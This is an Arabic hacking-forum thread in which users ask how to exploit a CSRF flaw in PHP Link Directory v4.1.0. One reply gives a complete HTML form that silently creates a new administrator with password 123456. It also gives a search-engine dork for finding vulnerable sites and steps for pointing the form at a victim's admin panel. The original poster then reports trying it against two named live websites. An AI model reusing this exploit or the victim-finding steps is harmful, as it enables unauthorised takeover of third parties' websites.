شرح ثغراة PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin)

[العرفى]

اخوانى لقيت الثغاره هذا بس ما عرفت كيف استفيد منها
http://www.expbase.com/WebApps/13742.html
ممكن شرح بسيط
كتابي او با الصور
وشكرااااااااا

[الهكر المنتظر]

والله انا زيك

بس اخوي ابي استفسرك كيف خلي الخط حق الموضوع كبير

[T!F!NaR]

السلام عليكم
الموضوع ليس في قسمه المناسب
لكن
ابحث عن المواقغ بالدروك Powered by: PHP Link Directory
اختر موقع
و انسخ هدا الكود
<html>
<head>
<title>PHP Link Directory v4.1.0 [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/conf_users_edit.php?action=N">
<input type="hidden" name="LOGIN" value="webmaster"/>
<input type="hidden" name="NAME" value="Mohammad Hussien"/>
<input type="hidden" name="PASSWORD" value="123456"/>
<input type="hidden" name="PASSWORDC" value="123456"/>
<input type="hidden" name="LANGUAGE" value="sq"/>
<input type="hidden" name="EMAIL" value="[email protected]"/>
<input type="hidden" name="cemail" value="1"/>
<input type="hidden" name="LEVEL" value="1"/>
<input type="hidden" name="formSubmitted" value="1"/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="exclude_id" value=""/>
</form>

وضعه في ملف نصي جديد و احفظه بصيغة html


عوض http://localhost االموقع المصاب

Mohammad Hussien

باسم المدير الادمن الجديد
و العدد 123456 الباسوورد الجديد
و احفظ الملف
ا وفتحه في المتصفح
وشوف النتيجة مرضية جدا
تحياتي لك

[الهكر المنتظر]

اخي انا ماني فاهم هذا الكلام

عوض http://localhost االموقع المصاب

Mohammad Hussien

باسم المدير الادمن الجديد
و العدد 123456 الباسوورد الجديد
و احفظ الملف
ا وفتحه في المتصفح
وشوف النتيجة مرضية جدا
تحياتي لك

ارجو التوضييح

[العرفى]

مشكور اخى على الشرح بس النتيجة كانت
CSRF Add Admin By AtT4CKxT3rR0r1ST هذا ما يظهر لي
والتجربة كانت على
http://poweredbyphpld.com/
http://www.republicapr.com/

[محمد_هكر]

مشكوررررررررررررررررررررر ررررررررررر

[legend406]

جزاك الله خير

[sssssss]

مشكوووووووووووووورررررررر ررررررررررررررررررررر